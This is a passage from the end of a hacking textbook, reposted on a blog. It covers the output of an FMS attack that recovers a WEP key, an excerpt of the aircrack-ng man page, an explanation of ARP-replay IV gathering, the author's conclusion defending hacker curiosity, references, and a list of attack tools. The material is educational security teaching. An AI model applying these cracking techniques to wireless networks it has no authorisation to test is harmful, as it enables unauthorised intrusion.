 16  2 |  48  0 |  80  1 | 112  1 | 144  3 | 176  0 | 208  0 | 240  0 |
 17  1 |  49  0 |  81  0 | 113  1 | 145  1 | 177  0 | 209  0 | 241  0 |
 18  0 |  50  2 |  82  0 | 114  1 | 146  0 | 178  0 | 210  1 | 242  0 |
 19  0 |  51  0 |  83  4 | 115  1 | 147  0 | 179  1 | 211  4 | 243  2 |
 20  0 |  52  1 |  84  1 | 116  4 | 148  0 | 180  1 | 212  1 | 244  1 |
 21  0 |  53  1 |  85  1 | 117  0 | 149  2 | 181  1 | 213 12*| 245  1 |
 22  1 |  54  3 |  86  0 | 118  0 | 150  1 | 182  2 | 214  3 | 246  1 |
 23  0 |  55  3 |  87  0 | 119  1 | 151  0 | 183  0 | 215  0 | 247  0 |
 24  0 |  56  1 |  88  0 | 120  0 | 152  2 | 184  0 | 216  2 | 248  0 |
 25  1 |  57  0 |  89  0 | 121  2 | 153  0 | 185  2 | 217  1 | 249  0 |
 26  1 |  58  0 |  90  1 | 122  0 | 154  1 | 186  0 | 218  1 | 250  2 |
 27  2 |  59  1 |  91  1 | 123  0 | 155  1 | 187  1 | 219  0 | 251  2 |
 28  2 |  60  2 |  92  1 | 124  1 | 156  1 | 188  1 | 220  0 | 252  0 |
 29  1 |  61  1 |  93  3 | 125  2 | 157  2 | 189  2 | 221  0 | 253  1 |
 30  0 |  62  1 |  94  0 | 126  0 | 158  1 | 190  1 | 222  1 | 254  2 |
 31  0 |  63  0 |  95  1 | 127  0 | 159  0 | 191  0 | 223  2 | 255  0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)
key[12] is probably 213
reader@hacking:~/booksrc $

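This type of attack has been so successful that a newer wireless protocol called WPA should be used if you expect any form of security. However, a surprising number of wireless networks are still protected only by WEP. Nowadays, there are fairly robust tools for performing WEP attacks. One notable example is aircrack, which has been included with the LiveCD; however, it requires wireless hardware, which you may not have. There is plenty of documentation on how to use this tool, which is in constant development. The first manual page should get you started.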

AIRCRACK-NG(1)                                                   AIRCRACK-NG(1)

NAME
       aircrack-ng is a 802.11 WEP / WPA-PSK key cracker.

SYNOPSIS
       aircrack-ng [options] <.cap / .ivs file(s)>

DESCRIPTION
       aircrack-ng is a 802.11 WEP / WPA-PSK key cracker. It implements the so-
       called Fluhrer - Mantin - Shamir (FMS) attack, along with some new attacks
       by a talented hacker named KoreK. When enough encrypted packets have been
       gathered, aircrack-ng can almost instantly recover the WEP key.

OPTIONS
       Common options:

       -a <amode>
              Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.

       -e <essid>
              Select the target network based on the ESSID. This option is also
              required for WPA cracking if the SSID is cloacked.

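Again, consult the Internet for hardware issues. This program popularized a clever technique for gathering IVs. Waiting to gather enough IVs from packets could take hours, or even days. But since wireless is still a network, there will be ARP traffic. Since WEP encryption doesn't modify the size of the packet, it is easy to pick out which packets are ARP. This attack captures an encrypted packet that is the size of an ARP request and then replays it to the network thousands of times. Each time, the packet is decrypted and sent to the network, and a corresponding ARP reply is sent back out. These extra replies don't harm the network; however, each one is a separate packet with a new IV. Using this technique of tickling the network, enough IVs to crack the WEP key can be gathered in just a few minutes.

Chapter 0x800. Conclusion

Hacking tends to be a misunderstood topic, and the media likes to sensationalize, which only makes matters worse. Changes in terminology have been mostly ineffective; what is needed is a change in mind-set. Hackers are just people with innovative spirits and an in-depth knowledge of technology. Hackers aren't necessarily criminals, though as long as crime has the potential to pay, there will always be some criminals who are hackers. There is nothing wrong with hacker knowledge itself, despite its potential applications.

Like it or not, vulnerabilities exist in the software and networks that the world depends on from day to day. This is simply an inevitable result of the fast pace of software development. New software is often successful at first, even if it has vulnerabilities. This success means money, which attracts criminals who learn how to exploit these vulnerabilities for financial gain. This might seem like an endless downward spiral, but fortunately, the people finding vulnerabilities in software are not all profit-driven, malicious criminals. These people are hackers, each with his or her own motives: some are driven by curiosity, others are paid for their work, still others just like the challenge, and several are, in fact, criminals. The majority of these people have no malicious intent; instead, they help vendors fix their vulnerable software. Without hackers, the vulnerabilities and holes in software would remain undiscovered. Unfortunately, the legal system is slow and mostly ignorant with regard to technology. Often, draconian laws are passed and excessive sentences are handed down to scare people away from looking closely. This is childish logic: discouraging hackers from exploring and looking for vulnerabilities doesn't solve anything. Convincing everyone that the emperor is wearing fancy new clothes doesn't change the reality that he is naked. Undiscovered vulnerabilities just lie in wait for someone much more malicious than an average hacker to discover them. The danger of software vulnerabilities is that the payload could be anything. Replicating Internet worms are relatively benign when compared with the nightmare terrorism scenarios these laws are so afraid of. Restricting hackers with laws can make the worst-case scenarios more likely, since it leaves more undiscovered vulnerabilities to be exploited by those who aren't bound by the law and want to do real damage.

Some could argue that if there were no hackers, there would be no reason to fix these undiscovered vulnerabilities. That is one perspective, but personally I prefer progress over stagnation. Hackers play a very important role in the co-evolution of technology. Without hackers, there would be little reason for computer security to improve. Besides, as long as the questions "Why?" and "What if?" are asked, hackers will always exist. A world without hackers would be a world without curiosity and innovation.

Hopefully, this book has explained some basic techniques of hacking and perhaps even its spirit. Technology is always changing and expanding, so there will always be new hacks. There will always be new vulnerabilities in software, ambiguities in protocol specifications, and a myriad of other oversights. The knowledge gained from this book is just a starting point. It is up to you to expand on it by continually figuring out how things work, wondering about the possibilities, and thinking of the things the developers didn't think of. It is up to you to make the best of these discoveries and to apply this knowledge however you see fit. Information itself isn't a crime.

References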

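Aleph1. "Smashing the Stack for Fun and Profit." Phrack, no. 49, online publication at www.phrack.org/issues.html?issue=49&id=14#article

Bennett, C., F. Bessette, and G. Brassard. "Experimental Quantum Cryptography." Journal of Cryptology, vol. 5, no. 1 (1992), 3–28.

Borisov, N., I. Goldberg, and D. Wagner. "Security of the WEP Algorithm." Online publication at www.isaac.cs.berkeley.edu/isaac/wep-faq.html

Brassard, G. and P. Bratley. Fundamentals of Algorithmics. Englewood Cliffs, NJ: Prentice Hall, 1995.

CNET News. "40-Bit Crypto Proves No Problem." Online publication at www.news.com/News/Item/0,4,7483,00.html

Conover, M. (Shok). "w00w00 on Heap Overflows." Online publication at www.w00w00.org/files/articles/heaptut.txt

Electronic Frontier Foundation. "Felten vs. RIAA." Online publication at www.eff.org/IP/DMCA/Felten_v_RIAA

Eller, R. (caezar). "Bypassing MSB Data Filters for Buffer Overflow Exploits on Intel Platforms." Online publication at community.core-sdi.com/~juliano/bypass-msb.txt

Fluhrer, S., I. Mantin, and A. Shamir. "Weaknesses in the Key Scheduling Algorithm of RC4." Online publication at citeseer.ist.psu.edu/fluhrer01weaknesses.html

Grover, L. "Quantum Mechanics Helps in Searching for a Needle in a Haystack." Physical Review Letters, vol. 79, no. 2 (1997), 325–28.

Joncheray, L. "Simple Active Attack Against TCP." Online publication at www.insecure.org/stf/iphijack.txt

Levy, S. Hackers: Heroes of the Computer Revolution. New York: Doubleday, 1984.

McCullagh, D. "Russian Adobe Hacker Busted," Wired News, July 17, 2001. Online publication at www.wired.com/news/politics/0,1283,45298,00.html

The NASM Development Team. "NASM - The Netwide Assembler (Manual)," version 0.98.34. Online publication at nasm.sourceforge.net

Rieck, K. "Fuzzy Fingerprints: Attacking Vulnerabilities in the Human Brain." Online publication at freeworld.thc.org/papers/ffp.pdf

Schneier, B. Applied Cryptography: Protocols, Algorithms, and Source Code in C, 2nd ed. New York: John Wiley & Sons, 1996.

Scut and Team Teso. "Exploiting Format String Vulnerabilities," version 1.2. Available online at private users' websites.

Shor, P. "Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer." SIAM Journal of Computing, vol. 26 (1997), 1484–509. Online publication at www.arxiv.org/abs/quant-ph/9508027

Smith, N. "Stack Smashing Vulnerabilities in the UNIX Operating System." Available online at private users' websites.

Solar Designer. "Getting Around Non-Executable Stack (and Fix)." BugTraq post, August 10, 1997.

Stinson, D. Cryptography: Theory and Practice. Boca Raton, FL: CRC Press, 1995.

Zwicky, E., S. Cooper, and D. Chapman. Building Internet Firewalls, 2nd ed. Sebastopol, CA: O'Reilly, 2000.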

Sources

pcalc

A programmer's calculator from Peter Glen

`ibiblio.org/pub/Linux/apps/math/calc/pcalc-000.tar.gz`

NASM

The Netwide Assembler, from the NASM Development Group

`nasm.sourceforge.net`

Nemesis

A command-line packet injection tool from obecian (Mark Grimes) and Jeff Nathan

`www.packetfactory.net/projects/nemesis`

dsniff

A collection of network sniffing tools from Dug Song

`monkey.org/~dugsong/dsniff`

Dissembler

A printable ASCII bytecode polymorpher from Matrix (Jose Ronnick)

`www.phiral.com`

mitm-ssh

An SSH man-in-the-middle tool from Claes Nyberg

`www.signedness.org/tools/mitm-ssh.tgz`

ffp

A fuzzy fingerprint generation tool from Konrad Rieck

`freeworld.thc.org/thc-ffp`

John the Ripper

A password cracker from Solar Designer

`www.openwall.com/john`

扉页

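The bootable LiveCD provides a Linux-based hacking environment that is preconfigured for programming, debugging, manipulating network traffic, and cracking encryption. It contains all the source code and applications used in the book. Hacking is about discovery and innovation, and with this LiveCD you can immediately follow along with the book's examples and explore on your own.

The LiveCD can be used on most common personal computers without installing a new operating system or modifying the computer's current setup. The system requirements are an x86-based PC with at least 64MB of system memory and a BIOS that is configured to boot from a CD-ROM.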

posted @ 2025-11-28 09:41 绝不原创的飞龙
